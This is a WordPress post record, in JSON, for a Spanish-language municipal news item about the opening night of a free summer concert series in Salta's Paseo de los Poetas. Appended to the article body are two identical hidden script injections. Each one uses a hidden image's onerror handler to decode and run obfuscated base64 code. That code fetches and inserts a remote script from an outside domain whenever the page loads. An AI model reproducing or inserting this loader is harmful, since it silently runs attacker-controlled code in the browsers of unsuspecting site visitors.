{"id":2071,"date":"2023-01-10T10:46:59","date_gmt":"2023-01-10T13:46:59","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2071"},"modified":"2025-08-14T00:25:44","modified_gmt":"2025-08-14T03:25:44","slug":"gran-apertura-del-ciclo-musica-bajo-las-estrellas-en-el-paseo-de-los-poetas","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2071","title":{"rendered":"Gran apertura del ciclo \u00abM\u00fasica bajo las Estrellas\u00bb en el Paseo de los Poetas"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#e52e5c\"><strong><em>Vecinos y turistas disfrutaron de la primera velada al ritmo del Blues. La cita continuar\u00e1 todos los jueves de enero y febrero a las 21, con entrada libre y gratuita. En cada encuentro sonar\u00e1n diferentes g\u00e9neros musicales, habr\u00e1 Jazz, Funky, Rock, entre otros.<\/em><\/strong><\/h4>\n\n\n\n<p>La Municipalidad de Salta a trav\u00e9s de la Secretar\u00eda de Cultura y Turismo, invita a los vecinos y turistas a disfrutar del ciclo \u00abM\u00fasica bajo las Estrellas\u00bb en el Paseo de los Poetas. Ser\u00e1n todos los jueves de enero y febrero desde las 21, con entrada libre y gratuita.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"2073\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/ciclo-musica-bajo-las-estrellas-2-1024x576.jpeg\" alt=\"\" class=\"wp-image-2073\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/ciclo-musica-bajo-las-estrellas-2-1024x576.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/ciclo-musica-bajo-las-estrellas-2-300x169.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/ciclo-musica-bajo-las-estrellas-2-768x432.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/ciclo-musica-bajo-las-estrellas-2-1536x864.jpeg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/ciclo-musica-bajo-las-estrellas-2-696x392.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/ciclo-musica-bajo-las-estrellas-2-1068x601.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/ciclo-musica-bajo-las-estrellas-2-747x420.jpeg 747w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/ciclo-musica-bajo-las-estrellas-2.jpeg 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"2072\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/ciclo-musica-bajo-las-estrellas-3-1024x576.jpeg\" alt=\"\" class=\"wp-image-2072\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/ciclo-musica-bajo-las-estrellas-3-1024x576.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/ciclo-musica-bajo-las-estrellas-3-300x169.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/ciclo-musica-bajo-las-estrellas-3-768x432.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/ciclo-musica-bajo-las-estrellas-3-1536x864.jpeg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/ciclo-musica-bajo-las-estrellas-3-696x392.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/ciclo-musica-bajo-las-estrellas-3-1068x601.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/ciclo-musica-bajo-las-estrellas-3-747x420.jpeg 747w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/ciclo-musica-bajo-las-estrellas-3.jpeg 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"577\" data-id=\"2074\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/ciclo-musica-bajo-las-estrellas-1024x577.jpeg\" alt=\"\" class=\"wp-image-2074\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/ciclo-musica-bajo-las-estrellas-1024x577.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/ciclo-musica-bajo-las-estrellas-300x169.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/ciclo-musica-bajo-las-estrellas-768x433.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/ciclo-musica-bajo-las-estrellas-1536x866.jpeg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/ciclo-musica-bajo-las-estrellas-696x392.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/ciclo-musica-bajo-las-estrellas-1068x602.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/ciclo-musica-bajo-las-estrellas-745x420.jpeg 745w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/01\/ciclo-musica-bajo-las-estrellas.jpeg 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>La apertura estuvo a cargo de la banda local de blues \u201cBig o Tones Blues\u00bb quienes propusieron a los espectadores temas nacionales e internacionales de este g\u00e9nero musical. Su l\u00edder Juan \u00abEl Pela\u00bb Castillo agradeci\u00f3 a la Municipalidad y organizadores del ciclo por la invitaci\u00f3n.<\/p>\n\n\n\n<p>Al evento se acercaron vecinos de distintos puntos de la ciudad y gran cantidad de turistas que pudieron disfrutar de esta velada al aire libre.<\/p>\n\n\n\n<p>Por su parte, Fidel Puggioni, coordinador del ciclo, coment\u00f3: \u00abEstamos muy contentos de poder hacer este tipo de encuentros y que los salte\u00f1os y turistas sepan que pueden encontrar un espect\u00e1culo de nivel al aire libre y de manera gratuita\u201d y agreg\u00f3: \u201cEl Paseo de los Poetas nace como un centro cultural a cielo abierto y en las propuestas siempre nos acompa\u00f1a la Municipalidad, y es fundamental para todo el sector. Es un espacio que se fue transformando y adaptando a las necesidades de los vecinos, que hoy, gracias al trabajo coordinado, disfrutan de variadas actividades\u201d.&nbsp;&nbsp;<\/p>\n\n\n\n<p>En los pr\u00f3ximos encuentros -en el escenario ubicado en calle Esteco entre Alvarado y Urquiza- sonar\u00e1n Jazz, Funky, Rock and Roll, G\u00f3spel, otros ritmos.&nbsp;<\/p>\n\n\n\n<p>Luciana Chiozzi, directora de Industrias Creativas municipal, expres\u00f3: \u00abDesde la Municipalidad, desde el inicio de la gesti\u00f3n de la intendenta, Bettina Romero, buscamos apoyar y fomentar a todos los artistas locales; por ello hoy estamos compartiendo y colaborando con este&nbsp; ciclo musical en el Paseo de los Poetas y otras propuestas que tenemos preparadas para la temporada de verano\u201d.&nbsp;<\/p>\n\n\n\n<p>Para conocer la agenda de actividades ingresa a la pagina web\u00a0<a href=\"https:\/\/municipalidadsalta.gob.ar\/secretaria-turismo-cultura\/\">https:\/\/municipalidadsalta.gob.ar\/secretaria-turismo-cultura\/<\/a>\u00a0o a nuestras redes:\u00a0<a href=\"https:\/\/www.facebook.com\/SecCulyTurSLA\">https:\/\/www.facebook.com\/SecCulyTurSLA<\/a><\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Ciclo M\u00fasica Bajo las Estrellas en el Paseo de los Poetas\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/m0cXQfjgC2k?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Vecinos y turistas disfrutaron de la primera velada al ritmo del Blues. La cita continuar\u00e1 todos los jueves de enero y febrero a las 21, con entrada libre y gratuita. En cada encuentro sonar\u00e1n diferentes g\u00e9neros musicales, habr\u00e1 Jazz, Funky, Rock, entre otros. La Municipalidad de Salta a trav\u00e9s de la Secretar\u00eda de Cultura y [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2074,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,13],"tags":[],"class_list":{"0":"post-2071","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2071"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2071"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2071\/revisions"}],"predecessor-version":[{"id":7211,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2071\/revisions\/7211"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2074"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2071"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2071"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2071"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}